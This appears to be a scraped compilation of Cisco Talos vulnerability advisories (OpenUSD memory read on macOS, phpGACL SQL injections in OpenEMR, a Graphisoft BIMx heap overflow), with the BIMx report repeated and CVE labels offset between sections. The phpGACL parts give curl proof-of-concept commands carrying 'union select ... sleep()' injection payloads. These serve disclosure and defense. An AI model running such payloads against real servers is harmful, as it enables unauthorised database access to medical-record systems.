USD binary file format consists of a header pointing to a table of contents that in turn points to individual sections that comprise the whole file. Pointer to a table of contents, as well as back to individual sections from the table of contents, is represented as a 64 bit integer specifying a file offset where the table of contents, or specific section, can be found.

For example, table of contents is read using the following code:

    template <class Reader>
    CrateFile::_TableOfContents
    CrateFile::_ReadTOC(Reader reader, _BootStrap const &b) const
    {
        reader.Seek(b.tocOffset);                                        [1]
        return reader.template Read<_TableOfContents>();                 [2]
    }
    

At \[1\] , table of contents offset read from the file header is used to seek into the file and then the parser proceeds to parse the table of contents at \[2\]. When dealing with regular files, `seek` operations usually just shift the current file pointer to the specified offset, however in most practical uses of OpenUSD (including macOS and iOS utilities and applications) USD file will first be memory mapped. When seek is executed, no check is performed to ensure the offset still falls inside the currently memory mapped file. Since the `b.tocOffset` is a 64 bit integer that is read directly from the mapped file, this can be used to access and read any address in process’ address space.

Similarly to above example, same issue can be triggered when trying to parse individual sections of the file. Following code that parses `FIELDS` section illustrates this:

    template <class Reader>
    void
    CrateFile::_ReadFieldSets(Reader reader)
    {
        TfAutoMallocTag tag("_ReadFieldSets");
        if (auto fieldSetsSection = _toc.GetSection(_FieldSetsSectionName)) {               [3]
            reader.Seek(fieldSetsSection->start);                                           [4]
    
            if (Version(_boot) < Version(0,4,0)) {                                          [5]
                _fieldSets = reader.template Read<decltype(_fieldSets)>();
            } else {
                // Compressed fieldSets in 0.4.0.
                auto numFieldSets = reader.template Read<uint64_t>();
                _fieldSets.resize(numFieldSets);
    

When parsing the `FIELDS` section, an offset from table of contents is retrieved at \[3\] and used in a call to `Seek` at 4. Then at \[5\] the parsing continues. Again, no check is performed to ensure that the offset falls inside the file, enabling arbitrary memory read. While only `FIELDS` section example is given here, other section offsets are vulnerable, too.

USD files are usually distributed as `usdz` archives which can contains multiple distinct `usd` files each referencing each other, with careful file layout , this sort of vulnerability could be abused to probe the memory layout and influence which files are successfully loaded. This could be abused to achieve information leak and defeat exploitation mitigations such as ASLR.

**Crash Information**

This vulnerability has been tested on latest version of macOS Catalina 10.15.3.

    Current executable set to 'qlmanage' (x86_64).
    (lldbinit) settings set -- target.run-args  "-t" "poc_toc_offset.usdc" "-o" "./"
    (lldbinit) r
    Process 59980 launched: '/usr/bin/qlmanage' (x86_64)
    Testing Quick Look thumbnails with files:
        poc_toc_offset.usdc
    2020-06-23 18:59:28.405728-0500 qlmanage[59980:11301935] [General] Disabling connection to window server
    2020-06-23 18:59:28.406581-0500 qlmanage[59980:11301935] [General] Number of mach ports: 42
    2020-06-23 18:59:28.408263-0500 qlmanage[59980:11301959] [General] Cache is disabled (real server: NO - cache enabled: NO)
    2020-06-23 18:59:28.832447-0500 qlmanage[59980:11301959] MessageTracer: Falling back to default whitelist
    -----------------------------------------------------------------------------------------------------------------------[regs]
      RAX: 0xF041414241603141  RBX: 0x00007000060A1350  RBP: 0x00007000060A1250  RSP: 0x00007000060A1210  o d I t s Z a P c
      RDI: 0x00007000060A1290  RSI: 0x00007000060A12B8  RDX: 0x0000000000000000  RCX: 0x0000000000000000  RIP: 0x00007FFF379A6F00
      R8:  0x0000000000000000  R9:  0x0000000000000000  R10: 0x0000000100000000  R11: 0x00006FFF05EB22B8  R12: 0x0000000105822A00
      R13: 0x00007000060A12B8  R14: 0x00007000060A1290  R15: 0x00007FFF8DFD9890
      CS:  002B  FS: 0000  GS: 0000
    -----------------------------------------------------------------------------------------------------------------------[code]
    @ /System/Library/Frameworks/ModelIO.framework/Versions/A/ModelIO:
    ->  0x7fff379a6f00 (0x8d5f00): 4c 8b 38        mov    r15, qword ptr [rax]
        0x7fff379a6f03 (0x8d5f03): 48 83 c0 08     add    rax, 0x8
        0x7fff379a6f07 (0x8d5f07): 49 89 45 08     mov    qword ptr [r13 + 0x8], rax
        0x7fff379a6f0b (0x8d5f0b): 4c 89 f7        mov    rdi, r14
        0x7fff379a6f0e (0x8d5f0e): 4c 89 fe        mov    rsi, r15
        0x7fff379a6f11 (0x8d5f11): e8 72 01 00 00  call   0x7fff379a7088 ; ___lldb_unnamed_symbol87486$$ModelIO
        0x7fff379a6f16 (0x8d5f16): 4d 8b 26        mov    r12, qword ptr [r14]
        0x7fff379a6f19 (0x8d5f19): 49 c1 e7 05     shl    r15, 0x5
    -----------------------------------------------------------------------------------------------------------------------------
    
    Process 59980 stopped
    * thread #7, queue = 'quicklookd.serialgenerator', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
        frame #0: 0x00007fff379a6f00 ModelIO`___lldb_unnamed_symbol87485$$ModelIO + 122
    Target 0: (qlmanage) stopped.
    (lldbinit) bt
    * thread #7, queue = 'quicklookd.serialgenerator', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
      * frame #0: 0x00007fff379a6f00 ModelIO`___lldb_unnamed_symbol87485$$ModelIO + 122
        frame #1: 0x00007fff379944ed ModelIO`___lldb_unnamed_symbol87000$$ModelIO + 273
        frame #2: 0x00007fff379941c3 ModelIO`___lldb_unnamed_symbol86998$$ModelIO + 555
        frame #3: 0x00007fff37993e06 ModelIO`___lldb_unnamed_symbol86997$$ModelIO + 392
        frame #4: 0x00007fff37992ec9 ModelIO`___lldb_unnamed_symbol86984$$ModelIO + 447
        frame #5: 0x00007fff37a8bbf6 ModelIO`___lldb_unnamed_symbol91742$$ModelIO + 242
        frame #6: 0x00007fff37a8bac8 ModelIO`___lldb_unnamed_symbol91741$$ModelIO + 54
        frame #7: 0x00007fff37a39d2f ModelIO`___lldb_unnamed_symbol90729$$ModelIO + 287
    

**Timeline**

2020-07-01 - Vendor Disclosure (notified Pixar and Apple individually)  
2020-07-01 - Vendor (Pixar) acknowledged report  
2020-07-02 - Vendor (Apple) acknowledged report  
2020-07-14 - Talos tested latest beta of macOS Catalina 10.15.6  
2020-08-04 - Talos follow up with Pixar; no response  
2020-09-16 - 2nd follow up with Pixar  
2020-11-12 - Public Release

Discovered by Aleksandar Nikolic of Cisco Talos.

CVE-2020-13495: TALOS-2020-1104 || Cisco Talos Intelligence Group

Multiple SQL injection vulnerabilities exist in phpGACL 3.3.7. A specially crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

Multiple SQL injection vulnerabilities exist in phpGACL 3.3.7. A specially crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

OpenEMR 5.0.2  
OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce)  
phpGACL 3.3.7

**Product URLs**

http://phpgacl.sourceforge.net/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

**Details**

phpGACL is a PHP library that allows developers to implement permission systems via a Generic Access Control List.

The latest version of this library has been found to be used in OpenEMR, as such the tests have been performed against an OpenEMR instance.

Across the whole codebase of phpGACL, SQL queries are built using string concatenation, and parameters are often not sanitized.

The following is an (incomplete) list of code paths that lead to SQL injection, caused by missing sanitization of the input parameters that can be injected by an attacker via GET or POST request. Note that similar vulnerable patterns can be seen in `edit_objects.php`, `edit_object_sections.php` and others.

**CVE-2020-13566 - phpGACL database delete\_group SQL injection**

In `admin/edit_group.php`, when the POST parameter `action` is “Delete”, the POST parameter `delete_group` leads to a SQL injection:

    ...
    switch ($_POST['action']) {
        case 'Delete':
            $gacl_api->debug_text('Delete');
    
            if (count($_POST['delete_group']) > 0) {
                //Always reparent children when deleting a group.
                foreach ($_POST['delete_group'] as $group_id) {
                    $gacl_api->debug_text('Deleting group_id: '. $group_id);
    
                    $result = $gacl_api->del_group($group_id, TRUE, $group_type);     [1]
                    if ($result == FALSE) {
                        $retry[] = $group_id;
                    }
                }
    ...
    

The `delete_group` parameter is sent to the function `del_group` unsanitized:

    function del_group($group_id, $reparent_children=TRUE, $group_type='ARO') {
            switch(strtolower(trim($group_type))) {
                    case 'axo':
                            $group_type = 'axo';
                            $table = $this->_db_table_prefix .'axo_groups';
                            $groups_map_table = $this->_db_table_prefix .'axo_groups_map';
                            $groups_object_map_table = $this->_db_table_prefix .'groups_axo_map';
                            break;
                    default:
                            $group_type = 'aro';
                            $table = $this->_db_table_prefix .'aro_groups';
                            $groups_map_table = $this->_db_table_prefix .'aro_groups_map';
                            $groups_object_map_table = $this->_db_table_prefix .'groups_aro_map';
                            break;
            }
    
            $this->debug_text("del_group(): ID: $group_id Reparent Children: $reparent_children Group Type: $group_type");
    
            if (empty($group_id) ) {
                    $this->debug_text("del_group(): Group ID ($group_id) is empty, this is required");
                    return false;
            }
    
            // Get details of this group
            $query = 'SELECT id, parent_id, name, lft, rgt FROM '. $table .' WHERE id='. $group_id;     [2]
            $group_details = $this->db->GetRow($query);
    

As we can see, the only sanitized argument is `group_type`, while `group_id` (former `delete_group`) is appended to the query unsanitized \[2\].

**Exploit Proof of Concept**

This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL. This can be reproduced with the following command:

    curl -v -H "Cookie: $cookie" -d "action=Delete&delete_group[0]=1234 union select 1,2,3,4,sleep(3)" "http://openemr.dev/gacl/admin/edit_group.php?site=default"
    

**CVE-2020-13567 - phpGACL database parent\_id SQL injection**

Again in `admin/edit_group.php`, when the POST parameter `action` is “Submit”, the POST parameter `parent_id` leads to a SQL injection:

    ...
    case 'Submit':
        $gacl_api->debug_text('Submit');
    
        if (empty($_POST['parent_id'])) {
            $parent_id = 0;
        } else {
            $parent_id = $_POST['parent_id'];                                                                      [1]
        }
    
        //Make sure we're not reparenting to ourself.
        if (!empty($_POST['group_id']) AND $parent_id == $_POST['group_id']) {
            echo "Sorry, can't reparent to self!<br />\n";
            exit;
        }
    
        //No parent, assume a "root" group, generate a new parent id.
        if (empty($_POST['group_id'])) {
            $gacl_api->debug_text('Insert');
    
            $insert_id = $gacl_api->add_group($_POST['value'], $_POST['name'], $parent_id, $group_type);           [2]
        } else {
            $gacl_api->debug_text('Update');
    
            $gacl_api->edit_group($_POST['group_id'], $_POST['value'], $_POST['name'], $parent_id, $group_type);
        }
    ...
    

The parameter `parent_id` is passed to both `add_group` \[2\] and `edit_group` \[3\] unsanitized \[1\].

    function add_group($value, $name, $parent_id=0, $group_type='ARO') {
            switch(strtolower(trim($group_type))) {
                    case 'axo':
                            $group_type = 'axo';
                            $table = $this->_db_table_prefix .'axo_groups';
                            break;
                    default:
                            $group_type = 'aro';
                            $table = $this->_db_table_prefix .'aro_groups';
                            break;
            }
    
            $this->debug_text("add_group(): Name: $name Value: $value Parent ID: $parent_id Group Type: $group_type");
    
            $name = trim($name);
            $value = trim($value);
    
            if ( $name == '' ) {
                    $this->debug_text("add_group(): name ($name) OR parent id ($parent_id) is empty, this is required");
                    return false;
            }
    
            //This has to be outside the transaction, because the first time it is run, it will say the sequence
            //doesn't exist. Then try to create it, but the transaction will already by aborted by then.
            $insert_id = $this->db->GenID($this->_db_table_prefix.$group_type.'_groups_id_seq',10);
            if ( $value === '' ) {
                    $value = $insert_id;
            }
    
            $this->db->BeginTrans();
    
            // special case for root group
            if ($parent_id == 0) {
                ...
            } else {
                     if (empty($parent_id)) {
                             $this->debug_text("add_group (): parent id ($parent_id) is empty, this is required");
                             $this->db->RollbackTrans();
                             return FALSE;
                     }
    
                     // grab parent details from database
                     $query = 'SELECT id, lft, rgt FROM '. $table .' WHERE id='. $parent_id;                     [4]
                     $row = $this->db->GetRow($query);
    

The function `add_group` does not sanitize the `parent_id` at \[4\], which leads to a SQL injection.

    function edit_group($group_id, $value=NULL, $name=NULL, $parent_id=NULL, $group_type='ARO') {
            ...
            $set = array();
    
            // update name if it is specified.
            if (!empty($name)) {
                    $set[] = 'name='. $this->db->quote($name);
            }
    
            // update parent_id if it is specified.
            if (!empty($parent_id)) {
                    $set[] = 'parent_id='. $parent_id;                                     [5]
            }
    
            // update value if it is specified.
            if (!empty($value)) {
                    $set[] = 'value='. $this->db->quote($value);
            }
    
            if (empty($set)) {
                    $this->debug_text('edit_group(): Nothing to update.');
                    return FALSE;
            }
    
            $this->db->BeginTrans();
    
            $query  = 'UPDATE '. $table .' SET '. implode(',', $set) .' WHERE id='. $group_id;   [6]
            $rs = $this->db->Execute($query);
    
            if (!is_object($rs)) {
                    $this->debug_db('edit_group');
                    $this->db->RollbackTrans();
                    return FALSE;
            }
    

The function `edit_group` does not sanitize the `parent_id` at \[5\], which leads to a SQL injection at \[6\].

**Exploit Proof of Concept**

This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL. This can be reproduced with the following command:

    curl -v -H "Cookie: $cookie" -d "action=Submit&parent_id=1234 union select 1,2,sleep(3)&name=1" "http://openemr.dev/gacl/admin/edit_group.php?site=default"
    

**CVE-2020-13568 - phpGACL database group\_id SQL injection**

Again in `admin/edit_group.php`, when the POST parameter `action` is “Submit”, the POST parameter `group_id` leads to a SQL injection:

    ...
    case 'Submit':
        $gacl_api->debug_text('Submit');
    
        if (empty($_POST['parent_id'])) {
            $parent_id = 0;
        } else {
            $parent_id = $_POST['parent_id'];                                                                      [1]
        }
    
        //Make sure we're not reparenting to ourself.
        if (!empty($_POST['group_id']) AND $parent_id == $_POST['group_id']) {
            echo "Sorry, can't reparent to self!<br />\n";
            exit;
        }
    
        //No parent, assume a "root" group, generate a new parent id.
        if (empty($_POST['group_id'])) {
            $gacl_api->debug_text('Insert');
    
            $insert_id = $gacl_api->add_group($_POST['value'], $_POST['name'], $parent_id, $group_type);           [2]
        } else {
            $gacl_api->debug_text('Update');
    
            $gacl_api->edit_group($_POST['group_id'], $_POST['value'], $_POST['name'], $parent_id, $group_type);   [3]
        }
    ...
    

Like before, `group_id` is passed to `edit_group` \[2\] unsanitized:

    function edit_group($group_id, $value=NULL, $name=NULL, $parent_id=NULL, $group_type='ARO') {
            $this->debug_text("edit_group(): ID: $group_id Name: $name Value: $value Parent ID: $parent_id Group Type: $group_type");
    
            switch(strtolower(trim($group_type))) {
                    case 'axo':
                            $group_type = 'axo';
                            $table = $this->_db_table_prefix .'axo_groups';
                            break;
                    default:
                            $group_type = 'aro';
                            $table = $this->_db_table_prefix .'aro_groups';
                            break;
            }
    
            if (empty($group_id) ) {
                    $this->debug_text('edit_group(): Group ID ('. $group_id .') is empty, this is required');
                    return FALSE;
            }
    
            if ( !is_array($curr = $this->get_group_data($group_id, $group_type)) ) {      [4]
                    $this->debug_text('edit_group(): Invalid Group ID: '. $group_id);
                    return FALSE;
            }
            ...
    

The function `edit_group` calls `get_group_data` at \[4\], using the unsanitized `group_id`:

    function get_group_data($group_id, $group_type = 'ARO') {
    
            $this->debug_text("get_group_data(): Group_ID: $group_id Group Type: $group_type");
    
            switch(strtolower(trim($group_type))) {
                    case 'axo':
                            $group_type = 'axo';
                            $table = $this->_db_table_prefix .'axo_groups';
                            break;
                    default:
                            $group_type = 'aro';
                            $table = $this->_db_table_prefix .'aro_groups';
                            break;
            }
    
            if (empty($group_id) ) {
                    $this->debug_text("get_group_data(): ID ($group_id) is empty, this is required");
                    return false;
            }
    
            $query  = 'SELECT id, parent_id, value, name, lft, rgt FROM '. $table .' WHERE id='. $group_id;  [5]
            //$rs = $this->db->Execute($query);
            $row = $this->db->GetRow($query);
    
            if ($row) {
                    return $row;
            }
    
            $this->debug_text("get_object_data(): Group does not exist.");
            return false;
    }
    

We can see at \[5\] that `group_id` is concatenated to the `query`, leading to a SQL injection.

**Exploit Proof of Concept**

This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL. This can be reproduced with the following command:

    curl -v -H "Cookie: $cookie" -d "action=Submit&parent_id=1234&group_id=1234 union select 1,2,3,4,5,sleep(3)" "http://openemr.dev/gacl/admin/edit_group.php?site=default"
    

**Timeline**

2020-10-23 - Vendor Disclosure  
2021-01-05 - Vendor Patched  
2021-01-27 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2020-13567: TALOS-2020-1179 || Cisco Talos Intelligence Group

An exploitable code execution vulnerability exists in the file format parsing functionality of Graphisoft BIMx Desktop Viewer 2019.2.2328. A specially crafted file can cause a heap buffer overflow resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

An exploitable code execution vulnerability exists in the file format parsing functionality of Graphisoft BIMx Desktop Viewer 2019.2.2328. A specially crafted file can cause a heap buffer overflow resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Graphisoft BIMx Desktop Viewer 2019.2.2328

**Product URLs**

https://www.graphisoft.com/downloads/bimx/bimx\_desktop.html

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-680 - Integer Overflow to Buffer Overflow

**Details**

BIMx Desktop Viewer allows for models created by Graphisoft ArchiCad to be shared and viewed by anyone. With Desktop Viewer, clients can view their prospective models without the need of having to install the entire suite of tools needed to create the model itself.

The modules used in this vulnerability are below:

    00007ff77c5f0000 00007ff77c818000   BIMx       (deferred)
        Image path: BIMx.exe
        Image name: BIMx.exe
        Timestamp:        Wed Jun  5 08:09:29 2019 (5CF7BF09)
        CheckSum:         00000000
        ImageSize:        00228000
        File version:     2019.2.2328.0
        Product version:  2019.2.2328.0
    

The BIMx file format is composed of a variety of resource files which are read and written to disk before processed. To begin processing a given resource file, a 520 byte chunk is read from the file.

    bimx+55c20
    .text:0000000000055C20  mov  r9, r14                 ; Input File Stream
    .text:0000000000055C23  mov  edx, 208h               ; Number of elements to read
    .text:0000000000055C28  mov  r8d, 1                  ; Size of each elements
    .text:0000000000055C2E  lea  rcx, [rbp+3F0h+var_470] ; Output buffer
    .text:0000000000055C32  call cs:fread                ; Call fread
    

This file chunk contains the name of the resource along with the number of bytes contained in this resource. This chunk looks like the following struct:

    struct ResourceHeader {
        name: [u8; 512],
        offset_to_struct: u32,
        length_of_data: u32,
    }
    

The application then allocates enough memory to fill with the resource bytes. Along with the resource bytes, themselves, the allocation can also contain an attribute or note of what the allocation is for.

    bimx+78572
    .text:0000000000078572  inc     rbx                    ; Increment note pointer
    .text:0000000000078575  cmp     byte ptr [rdx+rbx], 0  ; Check if we found the end of the note
    .text:0000000000078579  jnz     short loc_78572        ; Continue incrementing
    

The application then calculates the length of the note and then adds that to the found number of bytes for this resource for the final allocation.

    bimx+78589
    .text:0000000000078589  lea     eax, [rbx+6]
    .text:000000000007858C  cdq
    .text:000000000007858D  and     edx, 0Fh
    .text:0000000000078590  lea     edi, [rdx+rax]
    .text:0000000000078593  sar     edi, 4
    .text:0000000000078596  inc     edi
    .text:0000000000078598  shl     edi, 4
    .text:000000000007859B  lea     ecx, [rdi+r15]  ; Final add of resource bytes and note length
    .text:000000000007859F  movsxd  rcx, ecx        
    .text:00000000000785A2  call    cs:__imp_malloc
    

Assuming there is no problem with the allocation, the entire allocation is set to 0 and then filled with the resource bytes.

    bimx+785b0
    .text:00000000000785B0                 movsxd  rdi, edi        ;
    .text:00000000000785B3                 mov     edx, 0AAh       ; Memset the note bytes to 0xaa
    .text:00000000000785B8                 mov     r8, rdi         ; Allocation note size
    .text:00000000000785BB                 mov     [rsp+38h+arg_0], rbp
    .text:00000000000785C0                 mov     rcx, r14        ; void *
    .text:00000000000785C3                 call    memset
    .text:00000000000785C8                 lea     rbp, [rdi+r14]  ; Address after the allocation note
    .text:00000000000785CC                 mov     r8, r15         ; Number of resource bytes
    .text:00000000000785CF                 mov     rcx, rbp          
    .text:00000000000785D2                 xor     edx, edx        ; Fill with 0
    .text:00000000000785D4                 call    memset
    .text:00000000000785D9                 movzx   edi, bl
    .text:00000000000785DC                 mov     rdx, rsi        ; Allocation note
    .text:00000000000785DF                 mov     r8d, edi        ; Allocation note length
    .text:00000000000785E2                 mov     rcx, r14        ; New allocation
    .text:00000000000785E5                 call    memcpy
    

It is possible for an attacker to overflow the malloc allocation size after adding the resource length. This will result in an allocation that is smaller than requested. Since the allocation is smaller than expected, the memset and the memcpy cause an out of bounds write on a heap buffer, potentially resulting in a code execution.

**Crash Information**

(1bd9c.1bda4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. \*\*\* WARNING: Unable to verify checksum for BIMx.exe VCRUNTIME140!memset\_repmovs+0x9: 00007ffb\`d8f91689 f3aa rep stos byte ptr \[rdi\]

**Timeline**

2020-03-26 - Initial contact  
2020-03-31 - Vendor disclosure  
2020-06-30 - 90 day notice  
2020-07-03 - Vendor advised reports filtered as spam  
2020-07-07 - Issued copy of reports & vendor confirmed  
2020-07-28 - Vendor advised new version will address issue mid September  
2020-09-15 - Follow up with vendor; no response  
2020-11-06 - Public Release

Discovered by Cory Duplantis of Cisco Talos.

CVE-2020-6099: TALOS-2020-1032 || Cisco Talos Intelligence Group

**SUMMARY**

An exploitable code execution vulnerability exists in the file format parsing functionality of Graphisoft BIMx Desktop Viewer 2019.2.2328. A specially crafted file can cause a heap buffer overflow resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Graphisoft BIMx Desktop Viewer 2019.2.2328

**PRODUCT URLS**

BIMx Desktop Viewer - https://www.graphisoft.com/downloads/bimx/bimx\_desktop.html

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-680 - Integer Overflow to Buffer Overflow

**DETAILS**

BIMx Desktop Viewer allows for models created by Graphisoft ArchiCad to be shared and viewed by anyone. With Desktop Viewer, clients can view their prospective models without the need of having to install the entire suite of tools needed to create the model itself.

The modules used in this vulnerability are below:

    00007ff77c5f0000 00007ff77c818000   BIMx       (deferred)
        Image path: BIMx.exe
        Image name: BIMx.exe
        Timestamp:        Wed Jun  5 08:09:29 2019 (5CF7BF09)
        CheckSum:         00000000
        ImageSize:        00228000
        File version:     2019.2.2328.0
        Product version:  2019.2.2328.0
    

The BIMx file format is composed of a variety of resource files which are read and written to disk before processed. To begin processing a given resource file, a 520 byte chunk is read from the file.

    bimx+55c20
    .text:0000000000055C20  mov  r9, r14                 ; Input File Stream
    .text:0000000000055C23  mov  edx, 208h               ; Number of elements to read
    .text:0000000000055C28  mov  r8d, 1                  ; Size of each elements
    .text:0000000000055C2E  lea  rcx, [rbp+3F0h+var_470] ; Output buffer
    .text:0000000000055C32  call cs:fread                ; Call fread
    

This file chunk contains the name of the resource along with the number of bytes contained in this resource. This chunk looks like the following struct:

    struct ResourceHeader {
        name: [u8; 512],
        offset_to_struct: u32,
        length_of_data: u32,
    }
    

The application then allocates enough memory to fill with the resource bytes. Along with the resource bytes, themselves, the allocation can also contain an attribute or note of what the allocation is for.

    bimx+78572
    .text:0000000000078572  inc     rbx                    ; Increment note pointer
    .text:0000000000078575  cmp     byte ptr [rdx+rbx], 0  ; Check if we found the end of the note
    .text:0000000000078579  jnz     short loc_78572        ; Continue incrementing
    

The application then calculates the length of the note and then adds that to the found number of bytes for this resource for the final allocation.

    bimx+78589
    .text:0000000000078589  lea     eax, [rbx+6]
    .text:000000000007858C  cdq
    .text:000000000007858D  and     edx, 0Fh
    .text:0000000000078590  lea     edi, [rdx+rax]
    .text:0000000000078593  sar     edi, 4
    .text:0000000000078596  inc     edi
    .text:0000000000078598  shl     edi, 4
    .text:000000000007859B  lea     ecx, [rdi+r15]  ; Final add of resource bytes and note length
    .text:000000000007859F  movsxd  rcx, ecx        
    .text:00000000000785A2  call    cs:__imp_malloc
    

Assuming there is no problem with the allocation, the entire allocation is set to 0 and then filled with the resource bytes.

    bimx+785b0
    .text:00000000000785B0                 movsxd  rdi, edi        ;
    .text:00000000000785B3                 mov     edx, 0AAh       ; Memset the note bytes to 0xaa
    .text:00000000000785B8                 mov     r8, rdi         ; Allocation note size
    .text:00000000000785BB                 mov     [rsp+38h+arg_0], rbp
    .text:00000000000785C0                 mov     rcx, r14        ; void *
    .text:00000000000785C3                 call    memset
    .text:00000000000785C8                 lea     rbp, [rdi+r14]  ; Address after the allocation note
    .text:00000000000785CC                 mov     r8, r15         ; Number of resource bytes
    .text:00000000000785CF                 mov     rcx, rbp          
    .text:00000000000785D2                 xor     edx, edx        ; Fill with 0
    .text:00000000000785D4                 call    memset
    .text:00000000000785D9                 movzx   edi, bl
    .text:00000000000785DC                 mov     rdx, rsi        ; Allocation note
    .text:00000000000785DF                 mov     r8d, edi        ; Allocation note length
    .text:00000000000785E2                 mov     rcx, r14        ; New allocation
    .text:00000000000785E5                 call    memcpy
    

It is possible for an attacker to overflow the malloc allocation size after adding the resource length. This will result in an allocation that is smaller than requested. Since the allocation is smaller than expected, the memset and the memcpy cause an out of bounds write on a heap buffer, potentially resulting in a code execution.

**Crash Information**

(1bd9c.1bda4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. \*\*\* WARNING: Unable to verify checksum for BIMx.exe VCRUNTIME140!memset\_repmovs+0x9: 00007ffb\`d8f91689 f3aa rep stos byte ptr \[rdi\]

**TIMELINE**

2020-03-26 - Initial contact  
2020-03-31 - Vendor disclosure  
2020-06-30 - 90 day notice  
2020-07-03 - Vendor advised reports filtered as spam  
2020-07-07 - Issued copy of reports & vendor confirmed  
2020-07-28 - Vendor advised new version will address issue mid September  
2020-09-15 - Follow up with vendor; no response  
2020-11-06 - Public Release

Discovered by Cory Duplantis of Cisco Talos.

Tag

#intel